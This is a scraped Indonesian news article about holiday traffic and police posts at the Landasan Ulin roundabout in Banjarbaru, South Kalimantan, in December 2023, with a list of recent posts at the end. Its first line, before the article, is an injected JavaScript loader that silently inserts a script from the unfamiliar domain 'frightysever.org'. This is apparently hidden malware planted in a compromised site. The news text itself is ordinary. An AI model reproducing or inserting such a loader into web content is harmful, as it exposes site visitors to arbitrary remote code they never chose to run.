(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Kawasan Bundaran Pesawat Landasan Ulin Diprediksi Tak Macet saat Tahun Baru


KANALKALIMANTAN.COM, BANJARBARU – Pantauan arus lalu lintas di bundaran pesawat Landasan Ulin Kota Banjarbaru terlihat lenggang dari kendaraan bermotor karena libur panjang Natal dan Tahun Baru, Selasa (26/12/2023).

Volume kendaraan roda empat mulai meningkat signifikan saat siang hari, terhitung mulai pukul 10.00 Wita hingga pukul 17.00 sore.

Kanit Lantas Polsek Liang Anggang, Iptu Suripto mengantakan kondisi arus lintas tidak separah pada Sabtu (23/12/2023) dan Minggu (24/12/2023) kemarin saat puncak perayaan Natal.

Baca juga: Kritik Pedas Proyek Air Mancur Jembatan Pasar Lama Rp11 Miliar, Netizen: Mubazir, Tak akan Berumur Panjang

Bengkel khusus Operasi Lilin dari Sat Lantas Polres Banjarbaru yang akan segera dioperasikan. Foto: Wanda

“Mobil cukup mendominasi arus lalu lintas yang saat ini, hanya terlihat merambat namun tidak sampai terkena macet,” ucap Iptu Suripto yang juga sekaligus menjasi Kepala Pos, Selasa (26/12/2023).

Saat malam hari pun ia mengatakan mobilitas masyarakat, khususnya pengguna angkutan darat cenderung relatif landai.

Dia juga mengungkapkan jam rawan malam terjadi pukul 02.00 hingga 04.00 Wita dini hari.

Baca juga: THM di Banjarmasin Diperbolehkan Buka saat Malam Tahun Baru 

“Akan kita lihat lagi perkembangannya pada puncak tahun baru, kemungkinan diperkirakan kembali mengalami peningkatan arus untuk arah ke dalam kota,” ungkap dia.

Kawasan bundaran pesawat di Ibu Kota Provinsi Kalimantan Selatan sendiri menjadi salah satu titik lintasan pengendara yang ingin berlibur ke luar daerah.

Sejumlah personel kepolisian bersama dengan Satpol PP, Dinas Perhubungan hingga Dinas Kesehatan berjaga di dalam pos mengantipasi kejahatan dan kerawanan lalu lintas di kawasan tersebut.

Baca juga: Melindungi Hak Adat Masyarakat Dayak Pitap Desa Kambiayian dari Incaran Pengeruk Kekayaan Pegunungan Meratus

“Penjagaan dari kepolisian dilaksanakan dengan tiga kali shift pukul 12.00-03.00 Wita, kecuali untuk Satpol PP, Dishub dan layanan kesehatan dijadwalkan terus berjaga dari pukul 08.00-20.00 Wita,” sebut dia.

Selain layanan kesehatan juga, di pos itu turut disediakan tempat beristirahat bagi pengendara dan juga bengkel khusus Operasi Lilin dari Sat Lantas Polres Banjarbaru yang akan segera dioperasikan.

Pihaknya mengatakan kawasan bundaran pesawat di Landasan Ulin itu akan diperkirakan aman dari kemacetan hingga puncak tahun baru nanti.

“Pada puncak tahun baru nanti kemungkinan masyarakat akan bertitik di pusat kota hingga bundaran simpang empat, kita perkirakan kemacetan akan terkendali di kawasan Landasan Ulin ini,” ucapnya.

Dirinya pun mengimbau kepada pengendara agar tetap memperhatikan keamanan dan keselamatan dalam berkendara selama libur panjang ini.

“Untuk menjaga keamanan pastikan kita harus selalu berdoa, menjaga kesehatan dan tetap waspada dari segala ancaman,” pungkas dia. (Kanalkalimantan.com/wanda)

Reporter : wanda

Editor : bie


Muhammad Andi

Recent Posts

Srikandi PLN UPT Palangkaraya Mengajar di SDN 5 Bukit Tunggal

KANALKALIMANTAN.COM, PALANGKARAYA – PT PLN (Persero) Unit Pelaksana Transmisi (UPT) Palangkaraya melalui gugus tugas Srikandi… Read More

27 menit ago

Pemkab HSU Gelar Peringatan Harkitnas

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan memimpin upacara peringatan… Read More

54 menit ago

‘Memakan’ Jalan, Lapak Pedagang Pasar Lama Diminta Mundur

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah pedagang yang berjualan di Pasar Lama Banjarmasin tepatnya di Jalan Pasar… Read More

1 jam ago

Komisi III Banjarbaru Minta Masterplan Mitigasi Banjir Disempurnakan

KANALKALIMANTAN.COM, BANJARBARU - Masterplan penanganan banjir di Ibu Kota Provinsi Kalimantan Selatan (Kalsel) Banjarbaru, masih… Read More

1 jam ago

Pemkab Banjar Peringati Harkitnas dan HUT ke-75 Proklamasi Gubernur Tentara ALRI Divisi IV Pertahanan Kalimantan

KANALKALIMANTAN.COM, MARTAPURA - Halaman Kantor Bupati Banjar menjadi lokasi dilaksanakannya peringatan ke-116 Hari Kebangkitan Nasional… Read More

4 jam ago

Dirut PLN Tinjau Posko Utama Kelistrikan KTT WWF, Pastikan Sistem Kelistrikan di Bali Andal

KANALKALIMANTAN.COM, DENPASAR - Direktur Utama PT PLN (Persero) Darmawan Prasodjo meninjau langsung Posko Utama Kelistrikan… Read More

5 jam ago

This website uses cookies.